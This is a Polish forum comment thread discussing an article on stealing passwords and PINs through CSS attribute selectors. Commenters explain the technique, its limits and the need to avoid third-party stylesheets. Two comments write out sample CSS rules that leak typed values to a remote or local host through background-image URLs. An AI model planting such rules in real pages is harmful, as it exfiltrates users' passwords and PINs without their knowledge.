Kradzież hasła przy pomocy CSS-a[eng]

Artykuł, zakończony filmikiem na temat opowiada jak w sprytny sposób można ukraść hasło z przeglądarki odpowiednim stylem w CSSie

wytrzzeszcz z dodany: 25.02.2018, 22:54:52

34
Odpowiedz

Komentarze (34)

najlepsze

maly_swd

26.02.2018, 11:47:02

W skrócie: (metodę można rozwinąć)

1. Reguła css jest napisana do każdej możliwej kombinacji (używa się tego do PINów).
2. CSS ma możliwość ułożenia reguły do wartości z inputa
3. Jeśli się zgadza wartość z reguła to przeglądarka odpytuje serwer o plik, który nazywa się tak jak wartość z pola.
4. Pliki mają wyłączone cachowanie

maly_swd

26.02.2018, 16:36:34

@snx: Podałem w uproszczeniu i w 100% jak przechwycić.

input[type="pin"][value$="0000"] { background-color: url(http://notahackaday.com/0000.png }
input[type="pin"][value$="0001"] { background-color: url(http://notahackaday.com/0001.png }
...
input[type="pin"][value$="9999"]

maly_swd

27.02.2018, 13:28:04

@SiergiejLapczydow: Np. reklamy mogą używać css ale już js nie. Reklamy możesz osadzać na dowolnych stronach przez agencje reklamowe.

hpiotrekh

26.02.2018, 20:28:59

A nie można emacsem przez sendmaila omijając przy tym potrójną ścianę ogniową?

Dobry_Ziemniak

26.02.2018, 21:27:50

@hpiotrekh: Wpuszczają w fake :(

severson

27.02.2018, 10:45:44

A nie można emacsem przez sendmaila omijając przy tym potrójną ścianę ogniową?

@hpiotrekh: Nie wiem, ale włamanie emacsem przez sendmail jest technicznie możliwe chyba

eMBee

26.02.2018, 21:15:23

I teraz zawód 'Programista CSS' nabiera nowego znaczenia... :D

shpyo

26.02.2018, 12:36:36

Było się na szkoleniu od @sekurak to się umie w hacking :D. W sumie to nic nowego.

securitymb

26.02.2018, 20:33:22

@shpyo: I na samym Sekuraku też o tym było: https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/

Neoqueto

27.02.2018, 13:09:18

Powiem więcej. Może nawet niekoniecznie wczytywać obrazki. W CSS można podlinkować pełen plik PHP jako background-image, przynajmniej jeśli zwróci on obrazek przez readfile. Wtedy dużo łatwiej będzie śledzić takie wczytywania obrazków. https://codepen.io/neoqueto/pen/yvQxwR (tutaj jako przykład rotator obrazków do banera)

graczu

27.02.2018, 11:22:38

Dlatego nie ładować plików CSS z obcych źródeł, tak amo plików JS, CDNów ( też mogą paść ofiarą ataków ).
A jak samemu się padnie ofiarą ataku to nikt nie będzie się raczej bawił by wyciągać hasła po CSS :-)

T.....X

konto usunięte 26.02.2018, 20:53:23

T.....X — **źródło:** comment_H5bOvF2czd0120oesQCQKtE8W17rovp5.jpg
Pobierz

mosqua

27.02.2018, 11:02:54

-1

(✌ ﾟ ∀ ﾟ)☞(✌ ﾟ ∀ ﾟ)☞(✌ ﾟ ∀ ﾟ)☞(✌ ﾟ ∀ ﾟ)☞(✌ ﾟ ∀ ﾟ)☞(✌ ﾟ ∀ ﾟ)☞

M.....r

konto usunięte 26.02.2018, 17:20:56

-3

Zaczyna się (－‸ლ)

wacky

26.02.2018, 08:11:14

-4

Ale to chyba tylko zadziała jak ktoś aktualizuje wpisane wartości w tym polu? Zazwyczaj nikt tego nie robi.
W takim przypadku to nie zadziała:

input[type="password"][value$="a"] {
 background-image: url("http://localhost:8000/a");
}

wacky

26.02.2018, 10:16:17

@Thael32: No nie jest tak dokonca. Próbowałem jak mówisz i przeglądarka o nic nie pyta. Pyta dopiero jak wygenerujesz strone z odpowiednią wartością inputa czyli np value="a".

Próbowalem to robić na Firefox ESR 52.3.0 (64 bit)